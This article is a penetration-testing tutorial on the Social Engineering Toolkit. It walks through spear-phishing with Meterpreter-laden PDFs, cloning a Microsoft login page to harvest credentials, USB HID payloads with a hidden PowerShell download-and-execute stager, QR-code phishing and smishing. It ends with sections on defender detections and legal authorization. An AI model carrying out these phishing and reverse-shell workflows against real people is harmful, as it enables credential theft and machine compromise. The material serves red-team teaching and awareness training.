What Is the Social Engineering Toolkit?
The Social Engineering Toolkit (SET), created by David Seetz (aka ReL1K) and maintained by the TrustedSec team, is an open-source Python-based framework that automates human-targeted attacks. Where network tools exploit technical vulnerabilities, SET exploits the greatest attack surface in any organization: people. It automates the creation of phishing sites, the deployment of credential harvesters, the generation of malicious USB drives, and the delivery of client-side exploits via the human as the attack vector.
SET is not a hacker novelty — it is a serious penetration testing tool used by red teams, social engineering consultants, and security awareness training programs worldwide. Its integration with the Metasploit Framework means that a successful phish can immediately open a Meterpreter shell on the target's machine, making it one of the highest-impact tools in a penetration tester's arsenal.
The toolkit is pre-installed on Kali Linux and runs on any Python 3 environment with the Metasploit Framework installed. It requires root privileges for most attacks.
Installation and Startup
$ # Kali Linux (pre-installed)
$ sudo apt update && sudo apt install set
$ # Or clone from GitHub
$ git clone https://github.com/trustedsec/social-engineer-toolkit.git
$ cd social-engineer-toolkit
$ sudo python3 setup.py install
$ # Launch SET
$ sudo setoolkit
[------------------------ Welcome to the Social Engineering Toolkit [------------------------]
The prime attack: human exploit
8.0.5
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the SET
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social Engineering Toolkit
set>
Spear-Phishing Attack Workflow
Spear-phishing is SET's most impactful attack vector. The toolkit automates the creation of a convincing phishing email containing either a malicious link (to a credential harvester) or a malicious file attachment (a crafted PDF or Office document with an embedded Meterpreter payload).
set> 1 Select from the menu: 1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social Engineering Template 99) Return to Main Menu set:sf> 1 1) E-Mail Attack Single Email Address 2) E-Mail Attack Mass Mailer 3) Create a Social Engineering Template 99) Return to Main Menu set:sf> 1 What payload do you want to generate: 1) Meterpreter_Reverse_TCP (default) 2) Meterpreter_Reverse_HTTPS 3) Meterpreter_Reverse_DNS 4) VNC Inject 5) Set of Social-Engineering attacks set:sf> 2 ← HTTPS for more evasive delivery Enter the IP ADDRESS or DOMAIN for the payload (LHOST): 192.168.1.105 Select the port for the listener [443]: 443 SET will generate a malicious PDF and host it Enter the name of your company: Acme Corporation Enter the subject of the email: Q1 2026 Financial Report — Confidential
SET then generates a weaponized PDF document with the embedded Meterpreter payload and sets up a Python SMTP server to deliver the email to the target. It also starts the Metasploit multi-handler to catch the reverse HTTPS connection when the target opens the PDF.
set:sf> send email [*] SET has sent the phishing email to [email protected] [*] Starting multi-handler... [msf] Starting Metasploit listener... [msf] Listening on https://192.168.1.105:443 — payload encoded # When target opens the PDF: [msf] meterpreter session opened from 192.168.1.198 [msf] OS: Windows 10 Pro 21H2 | System: X64 | Arch: x64 [meterpreter]> shell C:\Users\jsmit\Downloads> whoami acmecorp\jsmit
Credential Harvester — Web Clone Attack
The Credential Harvester clones a legitimate website's login page and hosts it on the attacker's machine, capturing any credentials entered. Combined with DNS spoofing or a WiFi Evil Twin, this becomes nearly undetectable to non-technical users.
set:webattack> 1 1) Web Templates (pre-made high-quality templates) 2) Site Cloner (clone an existing site) 3) Custom Import (import your own HTML) 99) Return to Webattack Menu set:webattack> 2 SET is now cloning: https://login.microsoftonline.com URL to clone: https://login.microsoftonline.com [+] Cloning the target website... [+] This may take a moment... [+] Credential harvester is ready at: http://192.168.1.105:80 [+] Site loaded. Waiting for credentials... [harvester] POST from 192.168.1.198 [harvester] Email: j.smith@acmecorp.com [harvester] Password: Summer2024!MFA [harvester] IP: 192.168.1.198 | User-Agent: Mozilla/5.0 (Windows 10)
SET automatically rewrites the cloned page's form action to submit to the local harvester script. When the user submits the form, they see a fake "Authentication Error" and are redirected to the real Microsoft login — which they'll assume was a transient glitch. The attacker captures both the username and the password.
Common Clone Targets
- Microsoft Online (Azure/365) — Most common in enterprise assessments
- Okta, Auth0, Ping Identity — SSO portals for SAML-based authentication
- Corporate VPN portals — AnyConnect, Fortinet SSL-VPN, OpenVPN
- Google Workspace — Gmail, Drive, Calendar login pages
- LinkedIn, Facebook, Twitter — For OSINT-linked social engineering
Java Applet Attack
The Java Applet attack is one of SET's most famous vectors. It spawns a fake Java applet that requests the target's permission to run — a permission dialog that most users instinctively click "Allow" on. The applet runs with full system privileges and delivers a Meterpreter payload. This attack works on Windows and macOS systems with Java installed.
set:attack> 3 The Java Applet Attack is a unique way to compromise targets using signed Java applets. This vectors currently works on: - Windows (all browsers with Java plugin) - macOS (Safari with Java plugin) Note: Modern browsers have largely disabled Java applets by default since 2017. Enter the IP address for the payload (reverse): 192.168.1.105 [+] Self-signed applet generated and ready [+] Applet will be served when target visits: http://192.168.1.105 [!] Modern browsers will show a security warning and block execution
The Java Applet attack is largely historical in 2026 — modern browsers disabled Java applets by default years ago, and Java itself has fallen out of common use. However, it remains a valid attack vector in legacy enterprise environments where internal applications still require Java Web Start or legacy Java plugins. Always check the target environment before dismissing it.
USB Attack Vector
The USB Attacks module generates malicious payloads on USB drives that execute automatically when the drive is plugged into a Windows machine. The original attack relied on Windows AutoRun/AutoPlay, but Microsoft disabled this feature in Windows 7 and later. SET has evolved to use multiple payload delivery mechanisms.
How the Attack Works (Modern Variant)
set:attack> 4 USB Attack Vector Options: 1) Teensy USB Attack (Arduino-based HID injection) 2) Scheduled Tasks (VBScript via autorun.inf substitution) 3) DLL Hiding (Masquerade as a legitimate USB file) 99) Return to Main Menu set:usb> 1 Generating HID keystroke injection payload... Select payload: 1) Meterpreter_Reverse_TCP 2) Shell Reverse TCP set:usb> 1 LHOST: 192.168.1.105 LPORT: [4444]: [+] Teensy payload created: /root/.set/reports/usb/teensy.hex [+] Flash this file to a Teensy microcontroller using Arduino IDE [+] When plugged in, the device will type and execute the payload
Why It Still Works
The modern USB attack isn't about AutoRun anymore — it's about human psychology. Someone finds a USB drive in a parking lot, sees an intriguing label ("Salary Info 2026.xlsx" or "HR Questions"), and plugs it into their laptop to find the owner. The moment they do, the HID (Human Interface Device) on the USB drive starts typing — mimicking a keyboard — and executes a PowerShell payload that downloads and runs Meterpreter.
The key to success is the social engineering layer: a well-labeled USB drive dropped in a company parking lot with an HR or payroll filename will have a high plug-in rate. Studies by Compair and the University of Illinois found that 48% of people who found USB drives in public places plugged them into personal or work computers.
$ # The VBScript payload that gets typed and executed by the HID device
$ cat /root/.set/reports/usb/payload.vbs
Set oShell = CreateObject("WScript.Shell")
oShell.Run "powershell -windowstyle hidden -enc WwBoAG8AdABlAC0AUABhAHMAcwB3AC8A..."
[...] Base64-encoded PowerShell Meterpreter download-and-execute stager
QR Code Attacks
SET can generate a QR code that, when scanned by a mobile device, directs the victim to a credential harvester. This is particularly effective in physical social engineering engagements where you can't easily send an email.
set:webattack> 5 QRCode Attack Vector Enter the URL for the QR code: http://192.168.1.105/get?token=acmecorp_vpn [+] QR Code generated and saved to: /root/.set/reports/qr_acmecorp.png [+] Print this QR code and place it on a poster or flyer [+] Users scanning the code will be directed to your credential harvester
Common deployment scenarios for QR code attacks:
- Printing fake "Free WiFi" QR codes and sticking them over legitimate signage in office buildings
- Placing QR codes on "employee appreciation" flyers near the cafeteria
- Including QR codes in physical mail sent to executives (quishing — QR phishing)
SMS Phishing (Smishing)
SET includes a built-in SMS phishing module that sends SMS messages to targets. Combined with a convincing message ("Your corporate VPN requires re-authentication: http://vpn.acmecorp.fake-site.com"), it provides a channel for social engineering that bypasses email security gateways entirely.
set:sms> 1 SMS Attack — Select a predefined template or write a custom message 1) IT Security Alert — Password Expired 2) HR Department — Benefits Update Required 3) CEO Request — Urgent Wire Transfer 4) IT Helpdesk — VPN Maintenance 99) Custom message set:sms> 4 Enter the phone number or file of numbers: +1-555-0100 Select the sending method: 1) Use built-in SMTP (anonymous) 2) Use email-to-SMS gateway (requires carrier knowledge) Sending SMS via SMTP relay... [+] SMS delivered: IT Helpdesk — VPN maintenance window tonight 11PM-1AM. Re-authenticate at: http://vpn.acmecorp.link
Sending SMS messages programmatically from a laptop requires either an SMTP-to-SMS gateway (which most carriers have restricted) or a cheap SMS API service like Twilio. In practice, many penetration testers use dedicated smishing platforms like Gophish or the Nuclei framework's SMS module for more reliable delivery.
How Defenders Detect SET Attacks
Organizations can implement several controls to detect and block SET attacks:
- Email security gateways: Most modern email security platforms (Microsoft Defender for Office 365, Google Workspace, Proofpoint) flag emails with suspicious characteristics that SET-generated emails often exhibit: mismatched sender domains, suspicious redirect links, and known SET SMTP patterns.
- URL sandboxing: Clicking a SET harvester link in a protected environment will trigger the sandbox to visit the page, detect the credential collection form, and flag the domain as a phishing site — often within minutes of it going live.
- Web phishing intelligence feeds: Services like PhishTank, Google Safe Browsing, and OpenPhish maintain blocklists of known phishing domains. If your phishing site appears on these feeds, it's effectively burned.
- Multi-factor authentication (MFA): Even if credentials are captured, a properly configured MFA policy (especially hardware FIDO2 keys or authenticator app push notifications) makes the stolen credentials useless for account takeover.
- User awareness training: Regular phishing simulations using tools like KnowBe4 or Gophish train users to recognize the signs of a SET-generated phishing email: urgency, mismatched sender addresses, suspicious links.
- HTTPS certificate inspection: SSL/TLS certificates on SET-hosted phishing sites are almost always self-signed or from Let's Encrypt — legitimate corporate login pages use certificates from trusted commercial CAs. Security gateways that inspect HTTPS traffic will flag the certificate chain anomalies.
Legal Considerations
The Social Engineering Toolkit requires explicit, written, signed authorization from the target organization before use. Social engineering attacks — particularly spear-phishing and USB drop attacks — are treated with the highest legal scrutiny because they involve deceiving human beings into taking security-compromising actions. The CFAA (US), Computer Misuse Act (UK), and equivalent laws globally all specifically cover unauthorized access obtained through deception. Violations can result in felony charges with sentences of up to 10–20 years in the US under the CFAA. Always use SET within a signed Rules of Engagement document with a defined scope.
Key legal requirements:
- Written scope: The engagement letter must specifically name social engineering attacks as an authorized technique
- Target identification: Know exactly which individuals are in scope — SET attacks that capture credentials from unintended targets (a co-worker's computer during a USB drop test) create legal exposure
- Data handling: Any credentials harvested must be handled as highly sensitive data, encrypted, and destroyed after the assessment
- Timing constraints: Define when the attack occurs — social engineering during off-hours or holidays may have unintended real-world consequences